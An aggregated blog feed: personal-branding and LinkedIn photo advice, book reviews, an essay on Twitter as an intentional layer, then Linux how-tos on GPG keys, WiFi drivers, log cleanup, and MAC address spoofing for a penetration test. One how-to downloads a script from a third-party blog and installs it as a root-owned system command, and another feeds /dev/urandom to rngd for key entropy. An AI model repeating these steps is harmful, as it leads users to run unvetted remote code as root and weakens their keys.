When people look at you, they see you brand, whether intentional or not.  It’s a lot like looking at things through a camera lense.  It’s a similar thing when you look at any successful business.  No matter if you see it’s sign on the side of the road, in an ad on a website or billboard, or you visit their booth at a conference – you know where you are and who you’re interacting with.  When you walk into any In-N-Out location or visit their website, you can feel their brand all around you.  You’ll never look at one and confuse it with Burger King or McDonald’s.  When you think about your personal brand, you need to attempt to achieve this as best you can.  Be the CMO of your brand!

What You Wear

Steve Jobs & Mark Zuckerberg's brand styleThere are a few notable people that we’d all recognize who were masters of their personal brand.  It wasn’t always because they were trying to do anything related with branding – sometimes it was purely functional – personal branding was the happy accident.  Steve Jobs is probably the most well-known, with his black turtle necks, loose-fitting jeans, and New Balance tennis shoes.  Mark Zuckerberg wears the same grey shirt mostly everyday.  Johnny Cash became known as “the man in black” for the very reason that the phrase suggests.  And Dean Kamen (he invented the Segwey) always was seen wearing jeans with his denim shirts.  These people embodied what was to become their personal brand, every day.

When I took over as president of a little known user group in Orlando, it had maybe 20 members, 9 of which you might see together at any given moment.  I took this responsibility seriously.  I wanted to grow the user group as fast and as large as I could.  I quickly learned and employed numerous techniques to do this.  One of the primary things I did was go to any other user group event in my area, and when I did, I always wore the same shirt, jeans, and matching shoes.  The shirt had the user group logo on it – large and pronounced.  Whenever you saw me at one of these events, you knew what I was there to represent.  You were aware of the user group I was leading. 

This was only one of many things I did, but it worked incredibly well.  We ended up having hundreds of members in our mailing list, a live streamed monthly meeting, advertising in the other user groups, regular members that would drive as far as 3 hours to a weeknight meeting, and a full board before I handed the reigns to the next leader.

How You Look and How You Sound

This is more related to the ways you’re represented when you’re not directly representing yourself.  This includes your personal website, social media profiles/bios, and so on.  Every surface, laptop, tablet, slide background, and even the moleskin notebook you might be carrying is an opportunity to showcase your personal brand to the people around you.  Don’t waste the opportunity.

I don’t represent the user group any longer, but I do represent an e-commerce company right now.  When you see me speak at events or visit clients, there’s no mistaking the brand I am projecting to you, and you won’t forget me.

Will Strohl speaking at an open source conference

If you have a personal website, you should make every effort for it to represent who you are.  It should also use photography, content, and colors that reinforce the personal brand you’re trying to build.  Your emails should all reflect the same branding you’ve settled on, and so on.

When you decide to have an avatar, follow the LinkedIn best practices, and make sure it’s the same avatar on all of your public profiles.  Also do the same with profile backgrounds and bio’s, if possible.  Keep them for long periods of time.  Every time you change your bio or avatar, people end up having to spend time getting to to know your brand again.

If you have a laptop or tablet that will be sitting in front of potential clients or opportunities, use a service like SkinIt to brand it.  It’s fun, it’s cheap, and it’s super easy.  (Also, it comes off easily.)  If you don’t do this, you’re wasting an incredibly effective way to spread your and reinforce your brand.  Like trailers in front of a movie, this is a simple method to connect with your captive audience.

You’ll undoubtedly meet people that could help spread your brand for you.  You’ll need to introduce yourself.  Like a business with their tag line, you should have an easy-to-remember phrase or short sentence that describes who you are and what you do.  If you don’t, recommending you will be much more difficult.  There should be nothing cocky about your introduction, but you really should think of something memorable – but please leave out ninja and guru (even expert is pushing it).  When you say your introduction, do it with confidence and always keep eye contact. 

Another part of your brand will often go overlooked… Your brand should be and project positivity.  It should help connect others.  Sure, a negative or controversial post will get a lot of likes, but it’s simply catering to the lowest common denominator of human nature.  In the end, it won’t inspire people, and it won’t reflect the best parts of you.  Your social currency is very valuable.  Every word you say costs you.  Spend it wisely.

Just to sum this up, I’m not here to suggest that you should wear the same clothing everyday.  However, you should have a consistent style in what you wear, what you say, and what you do. The whole point of this is that when someone needs to recommend someone like you – they remember you for the right reasons and recommend you before anyone else!


          Embracing the Jack of All Trades in Yourself        

What would you say you do here?

This article isn’t for everyone, but if you’ve found yourself reading this far, you probably consider yourself a jack-of-all-trades, or someone has said that about you.  It’s a double-edged sword to be known as someone who can do everything.  As the saying goes, “Jack-of-all-trades, master of none.”  When you’re good at a lot of things, it’s highly unlikely that you’re an expert at any one of those things.  This makes you difficult to hire in most cases, but don’t fret.  This also makes you one of the most valuable people in any company you find yourself in.

If you’re not already inherently a jack-of-all-trades, it’s probably not something you should aspire to be.  It requires a special kind of personality and a large investment of your time.  Every company needs both jacks-of-all-trades (or Jills), just as much as they need people that are focused completely on mastering specific jobs.  Whatever you naturally aspire to today is what you should continue to focus on.  Don’t try to be something you’re not.  It usually won’t work out in the long run.

Why You’re So Valuable

Swiss army knifeWhen you’re already filling a role somewhere, being the jack-of-all-trades makes you one of the best resources or investments in the company.  You’re their Swiss army knife.  As an example, instead of hiring a sales representative, they might have also gotten a data analyst, marketing automation manager, and a sales engineer.  This allows your superiors to leverage you in many more ways than just the job your were hired to do.  This gets you entrenched into the company in ways that you might not have imagined.  You’ll be making a difference by working laterally across departments, ensuring the success of the company.  No matter what your title is, this a great feeling!  (And it also means that the CEO knows your name, for the right reasons.)

Why You’re Such a Risky Hire

When your résumé or profile appears in front of a hiring manager, the prospect of having you join the team is an incredible risk.  Think about it…  Why do they want a Swiss army knife when they’re looking for a screwdriver or a saw?

They have the responsibility of hiring someone to fill a specific role.  It might be a sales account manager.  If you come in saying that you’re great at that and 3 other things, then you put them in a precarious situation.  Their reputation is at stake – maybe even their job.  If they hire wrong, they might not only get reprimanded for it, but they appear that they don’t know how to hire people, and they might even have ended up wasting a great deal of company resources getting you trained – only to let you go. 

When a hiring manager is looking at candidates, they need to first know that the person will be the absolute best hire for the primary position.  This is the equivalent of your daily commute in the morning.  Sure, you have about 100 ways to get to work, but only 1 way is the safest, most consistent route to get you to work on time everyday.  You generally choose the path of least risk. 

How You Make it Work for You

When you’re a jack-of-all-trades, you need to come into hiring situations like an illusionist.  You need to show the hiring manager what they expect to see.  When you get the gig, you then do the reveal – showing them that they not only made the right decision, but they made the best decision bringing you onto the team! 

Don’t Let the Secret Out (Yet)

This is not a one-size-fits-all formula, working in every scenario.  You need to be flexible.  Sometimes, you hold your cards close to the chest, only exposing your toolbox of skills once you’re on the team.  Other times, you discover that you need to open part of your toolbox during the interview.  Whatever you do, NEVER open your toolbox until you get the interview.  Why?  Because you won’t get the interview.  It’s rare that companies are actually looking for a jack-of-all-trades. 

Choose One

If you’re great at 4 things, weigh them all out.  Think of it like this.  If you could only choose one of those things to do for the rest of your like, which one would make you the most happy?  Which one are you the most passionate about?  Which one would you be excited to wake up and do tomorrow morning?  If you need to, make a list for each.  Just figure it out. 

If you’re having trouble choosing one, think about doing some role playing with a friend or colleague.  Have them interview you for the individual positions.  If you do this right, you’ll find that the one you should choose is likely the one you have to work the least at when faced with hard questions.

Focus On Your Choice

When you determine which one you need to focus on, the next step is to customize your LinkedIn profile and résumé to cater to that job.  Even if you have other jobs in your history, do what you can to work in keywords, phrases, and skill sets that relate to your chosen profession.  If you need help coming up with terminology for it, search around for job listings and descriptions that match what you’re looking for. 

If you want to be thorough, have versions of your résumé customized for your other complimentary professions drafted as well.  This will help you if you come across a potentially great opportunity that you really want to be considered for – but it matches a job you chose to not focus on.

Iterate

As you go through this process, you won’t get it right the first time.  Apply these changes and test them out.  Figure out what worked, and what didn’t.  Then update accordingly. 


          Avoid the 7 Deadly Sins of LinkedIn Photos        

Avoid the 7 Deadly Sins of LinkedIn Photos

In many ways, LinkedIn is just like every other social network.  It allows you to create a profile.  You add details about yourself, upload your preferred photo, and connect with other people.  You post status updates, and like and/or comment on updates by others.  However, as we continuously point out on this site, LinkedIn is not like every other social network.  You need to carefully consider how you update your profile on LinkedIn, beginning with your profile photo.

I’m using actual profile images that I’ve found on LinkedIn, in my “People You May Know” listing.  They are all professionals, including: managers, executives, owners, salespeople, marketers, customer service representatives, and others.

I’ll obviously not be exposing names or anything, but if you find yourself here and would prefer to not be highlighted here, please just let me know and I’ll remove your public photo from my site.  It’s not my intent to insult anyone here - only to help.  (However, if you feel this way, this should be a clear indication that you’re falling into one of the categories below.)

Don’t tale these tips lightly.  Unless you don’t need new opportunities, or your brand speaks for itself (e.g., world famous actor, CEO, or author), you should probably apply the tips here carefully.

Default profile image on LinkedInSin #1: Using the Default Profile Image

Unfortunately, LinkedIn can’t read our minds and it doesn’t know what we look like.  It’s up to us to tell LinkedIn how we want to be represented.  Like with everything else that you do and don’t do, the effort you put in here will reflect directly upon you and your character.  It shows how much you care about how you’re perceived online.  It helps people understand how much “attention to detail” you practice.  Above all, it’s your opportunity to stand out.  Make sure you do it in a good way.

Sin #2: Using an Outdated Photo

Sin #2: Using an Outdated Photo

It’s not always clear if a photo is actually old, or if it is simply poorly composed in some way (see below).  However, if it appears to be outdated, it’s a safe assumption for one to make to assume that your entire profile is also outdated.  Not having an updated photo also is a subtle queue that you’re not okay with having your photo taken.  Don’t worry, you’re not alone.  I couldn’t find any statistics on it, but I would guess that there’s somewhere around a 70/30 split with people that like their photo taken.  You don’t have to like your photo being taken, but you DO need to have a good one on your profile.  A good one means one that actually reflects what you look like today.

Imagine working with a prospective client over the phone.  After weeks or months of hard work online, you finally get the chance to work with them and you need to meet face-to-face.  They’ve looked you up.  The moment they meet you, the last thing you want is them questioning your integrity simply because you don’t look like your photo.  (Even if it is silly for them to do so.)  Keep your best foot forward and have a current photo on your profile instead.

Sin #3: Using a Blurry Photo

Sin #3 Using a Blurry Photo

It should go without saying, but a blurry photo is not a good way to represent who you are.  In most cases, I’ve found that people that have blurry photos simply don’t like their pictures taken – but a blurry photo and an old photo will have a similar result.  You’ll notice though, that these photos would be pretty good if they weren’t blurred.  Having a blurred photo signifies to people that you either don’t care how your profile appears, or you’re too lazy to make it any better.  In either case, it’s a simple fix here to prevent people from passing this kind of unfair judgment on you. 

Sin #4: Using a Upsized Photo

Sin #4: Using an Upsized Photo

Upsizing a photo is when you make a photo larger than the actual dimensions of the photo.  This results in a highly distorted version of the photo, like the first example.  In other cases, LinkedIn realizes that your uploaded photo is too small.  This results in a background being applied to your photo.  As you can tell, this doesn’t represent you well.  It also may signal to prospective opportunities that you’re not capable of working with technology, or not resourceful enough to work around it.  Regardless to whether this is a valid way for someone to look at you, you can avoid this altogether by simply getting a friend to help you generate and upload a properly sized photo.

Sin #5: Not Using a Photo of You

Sin #5: Not Using a Photo of You

The whole point of LinkedIn is to have a public representation of why you are the best candidate for that new job, contract, or other opportunity.  If you were in a room full of people, you wouldn’t be able to site there with a logo over your face, or have your kids sitting there on your behalf.  If you did this, you most certainly wouldn’t be the person chosen for the opportunity.  Why would you choose to do this on your LinkedIn profile? 

Unless you’re a graphic designer (and even then it’s still questionable), LinkedIn isn’t the place to express yourself using avatars of yourself, stock photography, symbols, or family photos.  That’s what Facebook and Twitter are for.  Your LinkedIn profile photo should look like what you’d want people to think of you on your first day on the job. 

Sin #6: Using an Unprofessional Photo

Sin #6: Using an Unprofessional Photo

If I wrote this article even as recent as a year ago, I might have only been able to find examples of people at parties.  There are still plenty of those on LinkedIn.  Luckily, it seems that most of us are getting smarter about the kind of photo we use for our profile.  The examples here are not nearly as unprofessional as they could have been.  When people are looking at your profile, I think we’ve established that they will be judging you.  You don’t want them making assumptions on why you took the photo, where you are, or what you were thinking to post it in the first place.  You want them focused on the experience and value you can bring to them.

Don’t post photos of you during sports, vacation, at parties or weddings.  If you happen to be wearing a tux and have a friend take a photo of you, that’s exactly what people see.  If you appear to be an extra in a hip hop video, scaling Mount Everest, or chilling on a Hawaiian shore, that’s what people will see.

Make sure you look like a professional in your photo, in a professional setting.  Doing anything else is the equivalent of walking into an interview in a tank top, sandals, and shorts.  You won’t be getting the gig.

Sin #7: Using a Poorly Composed Photo

Sin #7: Using a Poorly Composed Photo

Poorly composed doesn’t necessarily mean that the photo has bad lighting or appears to be squished.  It might also be your pose, background setting, not being cropped close enough, or simply being too creative.  People don’t look at LinkedIn to see how creative you are.  They want to see that you fit in with their idea of you working with the rest of the team.  Sure, there will be fun and creative times – but that’s not what they’re looking for.  That comes after you put your best foot forward, earning the opportunity. 

In the meantime, make sure that you are clearly visible in the photo.  Make sure it’s not squished, and it crops you close enough to tell what you look like.  Having some lights behind the camera will help too.  Also, please… PLEASE smile in your photo.  A partial smile usually works the best.  Otherwise, you run the risk of having your photo look like a mug shot. 

Simple Tips to Get a Good Photo

Great Examples of LinkedIn Profile Photos

In addition to some of the tips above, don’t use a selfie, webcam photo, or anything that even remotely looks like one.  It only takes a few moments to get a good photo of you.  Put on some professional clothes and bribe your friend, roommate, or significant other with some pizza or something.  (And take at least 20-30 photos. Only a couple will end up being usable.)

Make sure that you have even lighting behind the camera.  It should come from multiple directions or otherwise be quite bright, so that is doesn’t create pronounced shadows on your face. 

Use an actual camera.  Services like BorrowLenses.com make this easy.  You can rent a camera and equipment for as many days as necessary.  Having the right equipment can make it look like you’re a pro, without being one. 

Wear professional clothing, and don’t have a busy background.  The clothing should at least be what you’d wear to work on your first day – except one step better.

If your background does appear to be busy, use a photo editing program to gently blur the background to make sure you’re the focus.  If you don’t have the expertise to do this, there are plenty of ways to get it done for your.  Ask a friend for help, take a new photo, or use a service like Fivver or UpWork to get someone to help for almost nothing.  This will be one of the best investments that you can make in yourself.

Finally, if you must get creative, make sure it doesn’t interfere with your personal brand.  For example, in the photo above, you can see a gentleman that’s half football player and half suit.  This is actually an accurate representation of what he does.  He’s both a professional athlete, and an investment advisor.  It’s part of his brand.  He could have easily done this wrong, by having the logo of his favorite football team as his avatar. 

Don’t cut corners on your personal brand.  You’ll get every cent back in that investment. 


          Ultimate Guide to LinkedIn for Business        
Ultimate Guide to LinkedIn for Business
author: Ted Prodromou
name: Carrie
average rating: 3.29
book published: 2015
rating: 2
read at: 2015/08/27
date added: 2015/08/27
shelves:
review:


          The Art of Social Media: Power Tips for Power Users        
The Art of Social Media: Power Tips for Power Users
author: Guy Kawasaki
name: Carrie
average rating: 3.65
book published: 2014
rating: 3
read at: 2015/01/11
date added: 2015/01/15
shelves:
review:
This book consisted mostly of social media tips and was an easy read, with a lot of scannable content for those so busy doing social media that they probably barely have time to sit and read a book about it.I had of course heard of and heard Guy Kawasaki speak in person, but had never heard of his co-author, Peg Fitzpatrick, which did give me pause...if she was such a social media influencer, why had I never heard of her? (I'd be curious if others had heard of her before reading the book.) I do think name recognition important in this context.


While there were some valuable tips overall, I was a bit surprised that the book completely ignored important trends in online visibility, such as: brand ambassadors, Snapchat, Vine, Instagram video, podcasting, and other video platforms outside YouTube, such as Vimeo. The discussion of blogging could have been more substantive through at least a brief description of the various blogging platforms out there, and the suggestion to guest blog for places like Huffington Post and Hubspot probably not realistic for most of us, who are not as connected as the authors. I was also surprised that the discussion of YouTube was rather cursory, with no mention of hugely important tools such as annotations, geotagging, etc., and the suggestion to create a channel trailer, which is pretty common knowledge. I was also disappointed that the LinkedIn section was rather superficial. Most of us know to customize a request to connect and not use the default language LinkedIn provides, as well as the importance of connecting with Groups.


I agree with some of the other reviewers that the book could have used more case studies, and there were too many references to the companies Guy is involved with, particularly Canva. (I just started using Canva for Facebook posts, and while it's a cool platform, the fact that users have to pay for nearly all the images offered if they don't use their own photos, is pretty annoying.)


Visually, I found it odd that the book was full of underscores representing hyperlinks, but obviously if we are reading the hard copy this isn't going to happen, so why not do readers a favor and include the URLs in parentheses for us to look up on their own? It was also difficult to read the small screenshots meant to illustrate specific points.


On the positive side, I ended up with about 10 action items as takeaways, most related to Pinterest, with fresh tips on the arrangement of boards, use of public vs private boards, etc. But overall, the book could have been a more dynamic and compelling read.

          Is Twitter Becoming the Web's Intentional Layer?        
Intentionality is a philosophical term of art, and it refers to or 'points to' the directedness or aboutness of much of our mental and linguistic activity. Of much of our action. But 'intentionality' has also been used by web commentators, John Battelle, for one, when he considers the extent to which Google is striving to build a method of search which captures the user's intent and which is at the same time harvesting and modeling intentions and desires:

The Database of Intentions is simply this: The aggregate results of every search ever entered, every result list ever tendered, and every path taken as a result. It lives in many places, but three or four places in particular hold a massive amount of this data ......... This information represents, in aggregate form, a place holder for the intentions of humankind - a massive database of desires, needs, wants, and likes that can be discovered, subpoenaed, archived, tracked, and exploited to all sorts of ends. Such a beast has never before existed in the history of culture, but is almost guaranteed to grow exponentially from this day forward. John Battelle The Database of Intentions, 2003 -- [at that time Battelle gave pride of place in his blog to Google, MSN and Yahoo. I think now he would pick Google, Facebook and Twitter, possibly Amazon and Apple].

My intuitive 'internal model' for thinking about the web is of a constellation of HTML, of piles of content; comparable, and yet exceeding, the largest libraries. But the web is also and quite distinctively a constellation of links, hyperlinks, and these links are intents. Every hyperlink is itself an 'intentional act', a referential act that is also digital, an act that annihilates distance and short-circuits context and time, taking us instantaneously, magically, to the target of the link's intention. Every link that our finger points to on an iPad is the shadow of the intentional act of the author of the link, and the harbinger/blueprint for the intentional act of each user who follows the link. Viewing the web not so much as a static docuverse, but as a dynamic aggregation of usage and process, the intentional power of the web comes from the way it charts and shifts the attention, the intention, and the focus of its users. Google is as much an instrument for choice and for cognitive intent as it is also an engine for search. However there is a case for treating Twitter as a special case, as especially pure and nakedly intentional. Tweets are all about links and intentions and Twitter is building a massive intentional superstructure through the discourse and activity of Twitter users. There are at least three sources for Twitter's pervasive intentionality.

  1. Twitter's atomicity. Twitter's brevity hones the sharpness of a tweet's intentional aim. The 140 word limit forces directedness in tweeting. The character limit requires that the user targets with precision and clear reference the subject that is being tweeted. For a medium with such a narrow bandwidth, Twitter has been extraordinarily effective at finding ways of lassooing content with precision. Think twitpic and bit.ly. A picture may be worth a thousand words, but you do not need a thousand words to reference a picture in a tweet. It is not possible to say everything in a tweet (Godel's theorem and The Whitsun Weddings are just too subtle and long), but there is no practical limit to the stuff that one can refer to or touch on with a tweet.
  2. Twitter's asymmetry. Twitter in a deep way echoes the topology of the web, with the asymmetry of the follower/followed relationship matching the asymmetry of the hyperlink (that which is linked to often does not link back; just as I am more likely to follow Stephen Fry than he is to follow me). This asymmetry leads to a much more interesting network than the symmetrical relationships that were at the starting point of Facebook and Linkedin. Twitter piggybacks on the topology of the web (any url can be linked to as can any place on a Google map) but we should notice that it also escapes the web, since a good deal of Twitter activity takes place without the web, in apps, on SMS and mobile phones. Twitter's capillary vessels can run through the web, but they also allow us to wander off into digital by-ways that are beyond the web. This gives scope for broader digital intent and for a layer of crisp intentional communication which is not bound to the web, though it uses it.
  3. Twitter's syntactic devices. Twitter has a repertoire of formal devices which allows users to harness and amplify the intentions of others. The 'follow' relationship is a primary mechanism of amplification, since the tweeter with a large audience is like a speaker with a megaphone. Following is certainly not the only basis for collective action in the Twitter domain. Users have plenty of other devices for amplification and message modulation: 'retweeting', recommendations, Twitter lists, locations, and hashtags are all mechanisms that enable and allow the Twitter user to deploy collective intentionality. It might be better to say that these are mechanisms that allow users to participate in collective intentionality in a new and inherently digital way.
We should be careful not to give excessive focus to Twitter -- which is just the epitome of many other social internet technologies that enable us to share and focus desires, perceptions, references and approval. But Twitter's pure and naked intentional quality defines its usefulness and attractiveness. There are rumours that next week will see Apple announce that iOS 5 will support system level calls to Twitter. If that happens we will see less talk about the iPad being merely a lean back device.
          Consumer Publishers - What Apps Can Do For Them by Emma Bradfield        
This was the title of a seminar I attended at the London Book Fair yesterday, presented by Ros Wesson. Ros highlighted the interesting shift that consumer publishing has made from a B2B to B2C model through apps.

Whereas previously, publishers were protected from readers’ reviews by a buffer, consisting of book distributors and sellers, the advent of the App Store has moved them to the front line, in direct contact with users and their make-or-break verdicts.

Although this sounds terrifying, it is a small price to pay considering there are no printing or shipping costs involved with apps. In fact, being so close to your audience can be turned into a positive. App developers can receive feedback directly from their users, such as on iTunes or via email, and this can be used to inform future app updates.

Indeed, Exact Editions encourages feedback from its subscribers. We’ve had lots of enquiries asking for the ability to sync more than one issue for offline reading and about the possibility of an Android app. These are just two examples of subscriber feedback which we will be implementing shortly.

As Ross suggested, positive iTunes reviews can then be used within the app descriptions themselves to encourage further app installations. There’s nothing like ‘consumer-quoted confidence’ to generate a buzz around an app and five star reviews should be used as valuable marketing collateral both within iTunes and without!

          How to Generate GPG Public / Private Key Pair (RSA / DSA / ElGamal)?        
Written by Pranshu Bajpai |  | LinkedIn


This post is meant to simplify the procedure for generating GNUPG keys on a Linux machine. In the example below, I am generating a 4096 bit RSA public private key pair.

Step 1. Initiate the generation process

#gpg --gen-key
 This initiates the generation process. You have to answer some questions to configure the needed key size and your details. For example, select from several kinds of keys available. If you do not know which one you need, the default 1 will do fine.

I usually select my key size to be 4096 bits which is quite strong. You can do the same or select a lower bit size. Next, select an expiration date for your key -- I chose 'never'.



Step 2. Generate entropy


The program needs entropy, also known as randomness, to generate the keys. For this you need to type on the keyboard or move the mouse pointer or use disk. However, you may still have to wait a while before the keys are generated.


For this reason, I use rng-tools to generate randomness. First install 'rng-tools' by typing:
#apt-get install rng-tools
Run the tool: 
#rngd -r /dev/urandom
The process of finding entropy should now conclude faster. On my system, it was almost instantaneous.



Step 3. Check ~/.gnupg to locate the keys

Once the keys are generated, they are usually stored in ~/.gnupg, a hidden gnupg directory in the home folder. You can check the location of keys by typing:

#gpg -k
The key fingerprint can be obtained by:
   #gpg --fingerprint

Step 4. Export the public key to be shared with others


For others to be able to communicate with you, you need to share you public key. So move to the ~/.gnupg folder and export the public key:

#gpg --armor --export email@host.com > pub_key.asc
'ls' should now show you a new file in the folder called 'pub_key.asc'. 'cat' will show you that this is the public key file.



Important !

Needless to say, do not share your private key with anyone.
          [MACchanger] Spoofed MAC address changes back to original permanent MAC before connecting to WiFi        
Written by Pranshu Bajpai |  | LinkedIn


So I needed to spoof my machine's MAC / hardware address as part of a routine penetration test. One problem that I keep facing when using Kali Linux utility, 'macchanger', to do this is that the MAC does successfully spoof but changes back to the original MAC address right before I attempt to connect to a wireless access point. Good thing that years of working in security / hacking has made me paranoid enough to constantly check if the new spoofed MAC address is being used. 'ifconfig' in terminal tells me that it is not. Instead, right before connecting to the wireless access point my machine went back to it's original MAC address on 'wlan0'. Not good.


Solution to retain the spoofed MAC address on wlan0 in Kali Linux:


I've discovered that these 3 commands will help:

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up

Additionally, you may have to turn your WiFi off / on using the graphic panel in the top right. But now, you can connect to the wireless access point and then 'ifconfig wlan0' should reveal that your machine is using the spoofed MAC address: 00:11:22:33:44:55 as shown in image below.



          'apt-add-repository' command not found Debian / Ubuntu [Solution]        
Written by Pranshu Bajpai |  | LinkedIn

You might have encountered certain non-standard packages that have no installation candidates in your current repositories. In such cases, you can try to add a new repository. However, you might have encountered an error that says: 'apt-add repository' command not found. The system currently has no path to the binary 'apt-add-repository' which is why it says it cannot find that command.

Here's the fix


Execute the following commands in your terminal:

$wget http://blog.anantshri.info/content/uploads/2010/09/add-apt-repository.sh.txt
(thanks to the author this script!)
$mv add-apt-repository.sh.txt /usr/sbin/add-apt-repository

$chmod o+x /usr/sbin/add-apt-repository

$chown root:root /usr/sbin/add-apt-repository
If you are not using a 'root' account, then add a 'sudo' infront of each of these commands before executing them.

Now, trying adding the new repository again. For example:

$add-apt-repository ppa:webupd8team/sublime-text-2
$apt-get update

(the repository you are trying to add might be different in your case)


You should now be able to add new repositories to your system and install non-standard packages.



Please let me know in the comments below if you come across any issues.
          How to get WiFi to work after installing Ubuntu or Lubuntu on Macbook?        
Written by Pranshu Bajpai |  | LinkedIn

Problem: No WiFi connectivity in Lubuntu after installing it on a Macbook Air.


I recently installed Lubuntu to breath life into my old Macbook Air 1,1 (2008). The installation went smooth and the operating system is giving me no problems so far. The only thing that does not work right off the bat is WiFi -- in that I have no WiFi drivers or the icon. However, the icon is not a problem, getting the right drivers is.

After sifting through a lot of content on the Internet, I was able to get it working on my Mac Air 2008 and another Mac Air late 2010 3,2 model. Both of these have slightly different WiFi cards -- although both are Broadcom -- and so require slightly different procedures. But these steps should work for most people out there.

How to unable WiFi in Lubuntu on a Macbook?


Ubuntu, or Lubuntu, seems to be missing drivers for the Broadcom network hardware installed on a Macbook -- which leads to the problem of no WiFi. You need to get the drivers appropriate for your device.

With Internet connection


WiFi is obviously not working on this device yet, but if you have any other means of obtaining connectivity on this Macbook, then that simplies things a lot. Just type the following commands:

#sudo apt-get update
#sudo apt-get purge bcmwl-kernel-source
#sudo apt-get install firmware-b43-installer

The 'purge' part is to get rid of 'bcmwl-kernel-source' if you have been trying versions of that driver. It may or may not work for some systems. I tested on 2 different Macbook Air's (2008 and 2010) and both reacted different to it. I found 'firmware-b43-installer' to be more reliable.

Since you have connectivity, the apt-get command will simply load the best-suited version of the driver on your machine, and after a reboot, you should be able to get WiFi working. I wasn't so lucky though...

Without Internet connection


Find out exactly what WiFi hardware you have on your Macbook by using the following command:

#lspci -nn | grep Network

That will tell you the details you need to know. For instance, in my case, I received the following output:

01:00.0 Network controller [0280]: Broadcom Corporation BCM43224 802.11a/b/g/n [14e4:4353] (rev 01)

Here, 'BCM43224' is the important part. Look around for the best suited version of the following drivers for your card.

Now, you can go ahead and obtain b43_updated, unzip it, and copy it's contents into /lib/firmware/:

#sudo cp b43/ /lib/firmware
#sudo modprobe -rv b43
#sudo modprobe -v b43

Your /lib/firmware/ folder should now hold the necessary files:



Now reboot, and you should have the WiFi working.

WiFi network connectivity icon missing from panel

Do you still not see a difference? Maybe you're looking for the WiFi connection icon on the taskbar panel and it's just not there. In that case, 'nm-applet' is missing from your environment. You can fix this in the following manner:

Preferences --> Default applications for Lxsessions --> Autostart --> Manual Autostart -> type: nm-applet --> click: 'Add'

Logout and log back in. The WiFi applet should be there now.
          /var/log Disk Space Issues | Ubuntu, Kali, Debian Linux | /var/log Fills Up Fast        
Written by Pranshu Bajpai |  | LinkedIn

Recently, I started noticing that my computer keeps running out of space for no reason at all. I mean I didn't download any large files and my root drive should not be having any space issues, and yet my computer kept tellling me that I had '0' bytes available or free on my /root/ drive. As I found it hard to believe, I invoked the 'df' command (for disk space usage):
#df

So clearly, 100% of the disk partition is in use, and '0' is available to me. Again, I tried to see if the system simply ran out of 'inodes' to assign to new files; this could happen if there are a lot of small files of '0' bytes or so on your machine.
#df -i

Only 11% inodes were in use, so this was clearly not a problem of running out of inodes. This was completely baffling. First thing to do was to locate the cause of the problem. Computers never lie. If the machine tells me that I am running out of space on the root drive then there must be some files that I do not know about, mostly likely these are some 'system' files created during routine operations.

To locate the cause of the problem, I executed the following command to find all files of size greater than ~2GB:
# find / -size +2000M

Clearly, the folder '/var/log' needs my attention. Seems like some kernel log files are humongous in size and have not been 'rotated' (explained later). So, I listed the contents of this directory arranged in order of decreasing size:
#ls -s -S

That one log file 'messages.1' was 12 GB in size and the next two were 5.5 GB. So this is what has been eating up my space. First thing I did, was run 'logrotate':
#/etc/cron.daily/logrotate 
It ran for a while as it rotated the logs. logrotate is meant to automate the task of administrating log files on systems that generate a heavy amount of logs. It is responsible for compressing, rotating, and delivering log files. Read more about it here.

What I hoped by running logrotate was that it would rotate and compress the old log files so I can quickly remove those from my system. Why didn't I just delete that '/var/log' directory directly? Because that would break things. '/var/log' is needed by the system and the system expects to see it. Deleting it is a bad idea. So, I needed to ensure that I don't delete anything of significance.

After a while, logrotate completed execution and I was able to see some '.gz' compresses files in this directory. I quickly removed (or deleted) these.

Still, there were two files of around 5 GB: messages.1 and kern.log.1.  Since these had already been rotated, I figured it would be safe to remove these as well. But instead of doing an 'rm' to remove them, I decided to just empty them (in case they were being used somewhere).
#> messages.1
#> kern.log.1

The size of both of these was reduced to '0' bytes. Great! Freed up a lot of disk space this way and nothing 'broken' in the process.

How did the log files become so large over such a small time period?


This is killing me. Normally, log files should not reach this kind of sizes if logrotate is doing its job properly or if everything is running right. I am still interested in knowing how did the log files got so huge in the first place. It is probably some service, application or process creating a lot of errors maybe? Maybe logrotate is not able to execute under 'cron' jobs? I don't know. Before 'emptying' these log files I did take a look inside them to find repetitive patterns. But then I quickly gave up on reading 5 GB files as I was short on time.

Since this is my personal laptop that I shut down at night, as opposed to a server that is up all the time, I have installed 'anacron' and will set 'logrotate' to run under 'anacron' instead of cron. I did this since I have my suspicions that cron is not executing logrotate daily. We will see what the results are.

I will update this post when I have discovered the root cause of this problem.
          Multiple Screens in (Kali) Linux | How To        
Written by Pranshu Bajpai |  | LinkedIn

I have felt the need for multiple screens several times simply because of the many tabs and terminal windows I keep open on my box. Hence, to avoid constantly switching between these, I decided to bring in multiple screens . You might have felt the same--especially if you work on multiple applications simultaneously. Some people use these multiple screens while playing games as well.

Before I brought in new screens, I wanted to get a 'feel' of using them, and decide whether this is something I would be comfortable with while working. Fortunately, I had an old LG 17'' CRT monitor lying around which I used for testing this set up of multiple screens. Here, the operating system I am using is Kali Linux (Debian 7 wheezy) but the process is fairly straightforward and would work for any Linux (or Windows) box.

How to set up multiple screen on (Kali) Linux

Firstly, you need to make the hardware connection, that is, connect the other screen's display cable to your machine. In my case, I connected the old CRT monitor's VGA cable to my HP laptop.

You need to locate the 'Display' panel to set up the initial configuration. This should not be hard to do. On a Debian or Kali Linux box, this would be under 'Applications' --> 'System Tools' --> 'Preferences' --> 'System Settings' --> 'Displays'



The location of 'Displays' could vary according to your Linux distro, however, again, it should not be hard to locate. Once inside, you will see that your OS has detected the two displays. Uncheck 'Mirror displays'. By default, your laptop's screen is the primary display and would be on the left. You can drag and change this so that the laptop's display is on the right--as I have done here.


How to set the primary display screen

By default, your laptop's screen is your primary display. This means that the top panel, containing 'Applications' and 'Places', and the bottom panel, tracking open windows and tabs, would be available on the laptop's screen only. I wanted to change this so that my CRT monitor's screen was the primary screen. To do so, I edited the monitors.xml file in Linux.

Locate 'monitors.xml' in '/home/.config/monitors.xml' or '/root/.config/monitors.xml'. Now, edit it in a text editor so that you modify the line containing '<primary>yes/no</primary>'.


In my case, I have modified the xml file so that the part corresponding to my laptop's screen says  '<primary>no</primary>', and the part corresponding to the CRT monitor says '<primary>yes</primary>'.

Now, the CRT monitor is the primary screen and the 'Applications', 'Places' etc would show up here. After all the set up, this is what it looks like on my box:


Note that this is the extended display corresponding to both the screens, that is, half of this shows up on one screen and half on the other. This is a picture of my set up:


